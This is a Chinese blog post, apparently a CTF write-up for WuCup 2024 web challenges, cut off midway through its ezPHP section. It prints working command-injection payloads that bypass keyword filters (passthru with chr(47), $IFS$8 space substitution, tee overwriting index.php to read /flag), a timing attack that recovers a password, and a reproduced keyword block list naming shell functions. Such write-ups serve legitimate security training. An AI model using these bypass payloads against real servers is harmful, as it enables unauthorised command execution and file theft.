<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.2.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/luo.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/luo.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/manifest.json">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"luokuang1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"show_result":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideDownBigOut"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="Sign这个是一个签到题，题目直接给出一个webshell  passwd:sgin 下面就只需要post传sgin&#x3D;system(‘cat &#x2F;*’);即可 HelloHacker直接给源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748&lt;?php highligh">
<meta property="og:type" content="article">
<meta property="og:title" content="WuCup 2024">
<meta property="og:url" content="https://luokuang1.github.io/2024/12/01/WuCup-2024/index.html">
<meta property="og:site_name" content="luokuang的博客">
<meta property="og:description" content="Sign这个是一个签到题，题目直接给出一个webshell  passwd:sgin 下面就只需要post传sgin&#x3D;system(‘cat &#x2F;*’);即可 HelloHacker直接给源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748&lt;?php highligh">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://luokuang1.github.io/images/wucup1.png">
<meta property="og:image" content="https://luokuang1.github.io/images/wucup2.png">
<meta property="og:image" content="https://luokuang1.github.io/images/wucup3.png">
<meta property="og:image" content="https://luokuang1.github.io/images/wucup4.png">
<meta property="og:image" content="https://luokuang1.github.io/images/wucup5.png">
<meta property="og:image" content="https://luokuang1.github.io/images/wucup6.png">
<meta property="article:published_time" content="2024-12-01T08:19:42.000Z">
<meta property="article:modified_time" content="2025-02-19T14:59:04.583Z">
<meta property="article:author" content="luokuang">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://luokuang1.github.io/images/wucup1.png">


<link rel="canonical" href="https://luokuang1.github.io/2024/12/01/WuCup-2024/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://luokuang1.github.io/2024/12/01/WuCup-2024/","path":"2024/12/01/WuCup-2024/","title":"WuCup 2024"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>WuCup 2024 | luokuang的博客</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="luokuang的博客" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">luokuang的博客</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-links"><a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Sign"><span class="nav-number">1.</span> <span class="nav-text">Sign</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HelloHacker"><span class="nav-number">2.</span> <span class="nav-text">HelloHacker</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TimeCage"><span class="nav-number">3.</span> <span class="nav-text">TimeCage</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ezPHP"><span class="nav-number">4.</span> <span class="nav-text">ezPHP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Misc-Sign"><span class="nav-number">5.</span> <span class="nav-text">Misc-Sign</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Easy"><span class="nav-number">6.</span> <span class="nav-text">Easy</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="luokuang"
      src="/images/luo.jpg">
  <p class="site-author-name" itemprop="name">luokuang</p>
  <div class="site-description" itemprop="description">沉淀，还得继续沉淀</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://luokuang1.github.io/2024/12/01/WuCup-2024/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/luo.jpg">
      <meta itemprop="name" content="luokuang">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="luokuang的博客">
      <meta itemprop="description" content="沉淀，还得继续沉淀">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="WuCup 2024 | luokuang的博客">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          WuCup 2024
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2024-12-01 16:19:42" itemprop="dateCreated datePublished" datetime="2024-12-01T16:19:42+08:00">2024-12-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-02-19 22:59:04" itemprop="dateModified" datetime="2025-02-19T22:59:04+08:00">2025-02-19</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h3 id="Sign"><a href="#Sign" class="headerlink" title="Sign"></a>Sign</h3><p>这个是一个签到题，题目直接给出一个webshell  passwd:sgin</p>
<p>下面就只需要post传sgin=system(‘cat /*’);即可</p>
<h3 id="HelloHacker"><a href="#HelloHacker" class="headerlink" title="HelloHacker"></a>HelloHacker</h3><p>直接给源码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"><span class="title function_">highlight_file</span><span class="params">(__FILE__)</span>; </span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line">include_once <span class="string">&#x27;check.php&#x27;</span>; </span><br><span class="line">include_once <span class="string">&#x27;ban.php&#x27;</span>; </span><br><span class="line"></span><br><span class="line">$incompetent = $_POST[<span class="string">&#x27;incompetent&#x27;</span>]; </span><br><span class="line">$WuCup = $_POST[<span class="string">&#x27;WuCup&#x27;</span>]; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($incompetent !== <span class="string">&#x27;HelloHacker&#x27;</span>) &#123; </span><br><span class="line">    die(<span class="string">&#x27;Come invade!&#x27;</span>); </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">$required_chars = [<span class="string">&#x27;p&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;v&#x27;</span>, <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;n&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;z&#x27;</span>]; </span><br><span class="line">$is_valid = <span class="literal">true</span>; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!checkRequiredChars($WuCup, $required_chars)) &#123; </span><br><span class="line">    $is_valid = <span class="literal">false</span>; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($is_valid) &#123; </span><br><span class="line"></span><br><span class="line">    $prohibited_file = <span class="string">&#x27;prohibited.txt&#x27;</span>; </span><br><span class="line">    <span class="keyword">if</span> (file_exists($prohibited_file)) &#123; </span><br><span class="line">        $file = fopen($prohibited_file, <span class="string">&#x27;r&#x27;</span>); </span><br><span class="line">         </span><br><span class="line"><span class="keyword">while</span> ($line = fgets($file)) &#123; </span><br><span class="line">    $line = rtrim($line, <span class="string">&quot;\r\n&quot;</span>);   </span><br><span class="line">    <span class="keyword">if</span> ($line === <span class="string">&#x27;&#x27;</span> &amp;&amp; strpos($WuCup, <span class="string">&#x27; &#x27;</span>) === <span class="literal">false</span>) &#123; </span><br><span class="line">       </span><br><span class="line">        <span class="keyword">continue</span>; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">if</span> (stripos($WuCup, $line) !== <span class="literal">false</span>) &#123; </span><br><span class="line">        fclose($file);   </span><br><span class="line">        die(<span class="string">&#x27;this road is blocked&#x27;</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">         </span><br><span class="line">        fclose($file);   </span><br><span class="line">    &#125; </span><br><span class="line"></span><br><span class="line">    eval($WuCup); </span><br><span class="line">&#125; <span class="keyword">else</span> &#123; </span><br><span class="line">    die(<span class="string">&#x27;NO！NO！NO！&#x27;</span>); </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>
<p>这里就可以发现，在里面有一个prohibited.txt，可以直接访问看到里面的waf，内容太多，只展现一些</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">d</span><br><span class="line">m</span><br><span class="line">g</span><br><span class="line">:<span class="comment">//</span></span><br><span class="line"><span class="string">&#x27;</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string">`</span></span><br><span class="line"><span class="string">?</span></span><br><span class="line"><span class="string">@</span></span><br><span class="line"><span class="string">%</span></span><br><span class="line"><span class="string">.</span></span><br><span class="line"><span class="string">:</span></span><br><span class="line"><span class="string">$ </span></span><br><span class="line"><span class="string">&quot; </span></span><br><span class="line"><span class="string">; </span></span><br><span class="line"><span class="string">\</span></span><br><span class="line"><span class="string">/</span></span><br><span class="line"><span class="string">eval </span></span><br><span class="line"><span class="string">exec</span></span><br><span class="line"><span class="string">flag</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">assert</span></span><br><span class="line"><span class="string">map</span></span><br><span class="line"><span class="string">open</span></span><br><span class="line"><span class="string">call</span></span><br><span class="line"><span class="string">array</span></span><br><span class="line"><span class="string">preg</span></span><br><span class="line"><span class="string">php</span></span><br><span class="line"><span class="string">cat</span></span><br><span class="line"><span class="string">sort</span></span><br><span class="line"><span class="string">shell</span></span><br><span class="line"><span class="string">echo</span></span><br><span class="line"><span class="string">tac</span></span><br></pre></td></tr></table></figure>
<p>在里面有些字符是有但是没有被过滤的，比如;号，因为后面多了一个空格，导致没有真正的过滤，还有” $,这些后面会用到</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$required_chars = [<span class="string">&#x27;p&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;v&#x27;</span>, <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;n&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;z&#x27;</span>]; </span><br><span class="line">$is_valid = <span class="literal">true</span>; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!checkRequiredChars($WuCup, $required_chars)) &#123; </span><br><span class="line">    $is_valid = <span class="literal">false</span>; </span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>
<p>这里需要有一个required_chars里面字符的排列组合,通过python脚本找到一个没有给过滤的</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> itertools</span><br><span class="line"></span><br><span class="line"># 需要检查的字符串</span><br><span class="line">string_to_permute = <span class="string">&quot;pevanxroz&quot;</span></span><br><span class="line"></span><br><span class="line"># 禁止列表文件路径</span><br><span class="line">prohibited_file_path = r<span class="string">&quot;D:\写题\1.txt&quot;</span></span><br><span class="line"></span><br><span class="line"># 读取禁止列表文件中的所有内容</span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    with <span class="title function_">open</span><span class="params">(prohibited_file_path, <span class="string">&#x27;r&#x27;</span>)</span> as file:</span><br><span class="line">        prohibited_list = set(file.read().splitlines())</span><br><span class="line">except FileNotFoundError:</span><br><span class="line">    print(f<span class="string">&quot;文件 &#123;prohibited_file_path&#125; 未找到。&quot;</span>)</span><br><span class="line">    prohibited_list = set()</span><br><span class="line"></span><br><span class="line"># 生成所有排列组合</span><br><span class="line">permutations = itertools.permutations(string_to_permute)</span><br><span class="line"></span><br><span class="line"># 过滤掉禁止列表中的排列组合</span><br><span class="line">allowed_permutations = [<span class="string">&#x27;&#x27;</span>.join(p) <span class="keyword">for</span> p in permutations <span class="keyword">if</span> <span class="string">&#x27;&#x27;</span>.join(p) not in prohibited_list]</span><br><span class="line"></span><br><span class="line"># 打印不在禁止列表中的排列组合</span><br><span class="line"><span class="keyword">for</span> permutation in allowed_permutations:</span><br><span class="line">    print(permutation)</span><br></pre></td></tr></table></figure>
<p>oxzverapn，下面就可以通过;来进行分隔，发现passthru函数没有给过滤，可以通过passthru来命令执行，因为/号给过滤就想如何获取/再继续字符拼接即可，这里可以通过chr来将ascii码转字符,通过join函数来拼接，最后就可以得flag</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">incompetent=HelloHacker&amp;WuCup=oxzverapn;$a=[<span class="string">&quot;nl%09&quot;</span>,chr(<span class="number">47</span>),<span class="string">&quot;*&quot;</span>];$s=join(<span class="string">&quot;&quot;</span>,$a);print_r($s);passthru($s);</span><br></pre></td></tr></table></figure>
<h3 id="TimeCage"><a href="#TimeCage" class="headerlink" title="TimeCage"></a>TimeCage</h3><p>首先给源码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="title function_">show_source</span><span class="params">(__FILE__)</span>;</span><br><span class="line">include <span class="string">&#x27;secret.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(isset($_GET[<span class="string">&#x27;input&#x27;</span>]))&#123;</span><br><span class="line">    $guess = $_GET[<span class="string">&#x27;input&#x27;</span>];</span><br><span class="line">    $target = random_int(<span class="number">114</span> , <span class="number">114</span> + date(<span class="string">&#x27;s&#x27;</span>) * <span class="number">100000</span>);</span><br><span class="line">    <span class="keyword">if</span>(intval($guess) === intval($target))&#123;</span><br><span class="line">        echo <span class="string">&quot;The next challenge in &quot;</span>.$key1;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        echo <span class="string">&quot;Guess harder.&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里其实认真看就可以知道如果当秒刚好为0时就可以使target为114,这里就可以提交input=114并且不断的刷新页面即可，或者通过python来反复发包</p>
<p><img src="https://luokuang1.github.io/images/wucup1.png" width="95%" height="80%"></p>
<p>下一关Trapping2147483647.php</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"><span class="title function_">show_source</span><span class="params">(__FILE__)</span>; </span><br><span class="line">include <span class="string">&#x27;secret.php&#x27;</span>; </span><br><span class="line"><span class="keyword">if</span>(isset($_POST[<span class="string">&#x27;pass&#x27;</span>]))&#123; </span><br><span class="line">    $pass = $_POST[<span class="string">&#x27;pass&#x27;</span>]; </span><br><span class="line">    <span class="keyword">if</span>(strlen($pass) != strlen($password))&#123; </span><br><span class="line">        die(<span class="string">&quot;Wrong Length!&quot;</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    $isMatch = <span class="literal">true</span>; </span><br><span class="line">    <span class="keyword">for</span>($i = <span class="number">0</span>;$i &lt; strlen($password); $i++)&#123; </span><br><span class="line">        <span class="keyword">if</span>($pass[$i] != $password[$i])&#123; </span><br><span class="line">            $isMatch = <span class="literal">false</span>; </span><br><span class="line">            <span class="keyword">break</span>; </span><br><span class="line">        &#125; </span><br><span class="line">        sleep(<span class="number">1</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">if</span>($isMatch)&#123; </span><br><span class="line">        echo <span class="string">&quot;The final challenge in &quot;</span>.$key2; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span>&#123; </span><br><span class="line">        echo <span class="string">&quot;Wrong Pass!&quot;</span>; </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"><span class="comment">//Only digital characters in the password. </span></span><br></pre></td></tr></table></figure>
<p>这里是要获取password,可以先产生获取其长度，输入11111111得其长度为8，下面就可以产生每一位数的具体值</p>
<p>不断修改看方式请求的时间来判断，一个成功时间就会大于1秒，就不断的尝试，脚本发送有时判断不够准确，所以直接手动判断，最后得密码为56983215</p>
<p><img src="https://luokuang1.github.io/images/wucup2.png" width="95%" height="80%"></p>
<p>下一关EscapeEsc@p3Escape.php，这里就是一个rce,只是shell_exec没有回显</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"><span class="title function_">if</span><span class="params">(isset($_POST[<span class="string">&#x27;cmd&#x27;</span>])</span>)&#123; </span><br><span class="line">    $cmd = $_POST[<span class="string">&#x27;cmd&#x27;</span>]; </span><br><span class="line">    $pattern = <span class="string">&#x27;/[\&#123;\&#125;\[\]\(\)&amp;&lt;&gt;`\s\\\\]/&#x27;</span>; </span><br><span class="line">    <span class="keyword">if</span>(preg_match($pattern,$cmd))&#123; </span><br><span class="line">        die(<span class="string">&quot;Invalid Input!&quot;</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    shell_exec($cmd); </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">else</span>&#123; </span><br><span class="line">    show_source(__FILE__); </span><br><span class="line">&#125; </span><br><span class="line"><span class="comment">//flag is in /flag</span></span><br></pre></td></tr></table></figure>
<p>空格绕过用$IFS$8,刚开始尝试反弹shell但是没有成功，下面就写入文件得回显如果直接通过&gt;&gt;是被过滤了，但是还可以通过tee加通配符绕过，但是如果直接通过创建还是找不到，最后就可以直接通过覆盖前面的文件读回显，这样就可以执行命令</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cmd=ls|tee$IFS$8index.php</span><br><span class="line">cmd=cat$IFS$<span class="number">8</span><span class="comment">/*|tee$IFS$8index.php</span></span><br></pre></td></tr></table></figure>
<h3 id="ezPHP"><a href="#ezPHP" class="headerlink" title="ezPHP"></a>ezPHP</h3><p><img src="https://luokuang1.github.io/images/wucup3.png" width="95%" height="80%"></p>
<p>刚开始不知道应该如何写，通过dirsearch发现有一个flag.php文件，可以访问但是空白，这里通过bp抓包得php版本</p>
<p><img src="https://luokuang1.github.io/images/wucup4.png" width="95%" height="80%"></p>
<p>下面就是通过查询对应的php版本问题知道有一个源码泄露</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Kawakaze777/p/17799235.html">https://www.cnblogs.com/Kawakaze777/p/17799235.html</a></p>
<p>下面就是跟着尝试得源码</p>
<p><img src="https://luokuang1.github.io/images/wucup5.png" width="95%" height="80%"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="title function_">error_reporting</span><span class="params">(<span class="number">0</span>)</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">a</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $OAO;</span><br><span class="line">    <span class="keyword">public</span> $QAQ;</span><br><span class="line">        <span class="keyword">public</span> $OVO;</span><br><span class="line">    <span class="keyword">public</span> function <span class="title function_">__toString</span><span class="params">()</span>&#123;</span><br><span class="line">                <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/hello/&#x27;</span>, OVO))&#123;</span><br><span class="line">                        <span class="keyword">if</span> ($<span class="built_in">this</span>-&gt;OVO === <span class="string">&quot;hello&quot;</span>) &#123;</span><br><span class="line">                                <span class="keyword">return</span> $<span class="built_in">this</span>-&gt;OAO-&gt;QAQ;</span><br><span class="line">                        &#125;        </span><br><span class="line">                &#125;</span><br><span class="line">    &#125;</span><br><span class="line">        <span class="keyword">public</span> function <span class="title function_">__invoke</span><span class="params">()</span>&#123;</span><br><span class="line">                <span class="keyword">return</span> $<span class="built_in">this</span>-&gt;OVO;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">b</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $pap;</span><br><span class="line">        <span class="keyword">public</span> $vqv;</span><br><span class="line">    <span class="keyword">public</span> function <span class="title function_">__get</span><span class="params">($key)</span>&#123;</span><br><span class="line">        $functioin = $<span class="built_in">this</span>-&gt;pap;</span><br><span class="line">        <span class="keyword">return</span> $functioin();</span><br><span class="line">    &#125;</span><br><span class="line">        <span class="keyword">public</span> function <span class="title function_">__toString</span><span class="params">()</span>&#123;</span><br><span class="line">                <span class="keyword">return</span> $<span class="built_in">this</span>-&gt;vqv;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">c</span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $OOO;</span><br><span class="line">    <span class="keyword">public</span> function <span class="title function_">__invoke</span><span class="params">()</span>&#123;</span><br><span class="line">                <span class="meta">@$_</span> = $<span class="built_in">this</span>-&gt;OOO;</span><br><span class="line">                $___ = $_GET;</span><br><span class="line">                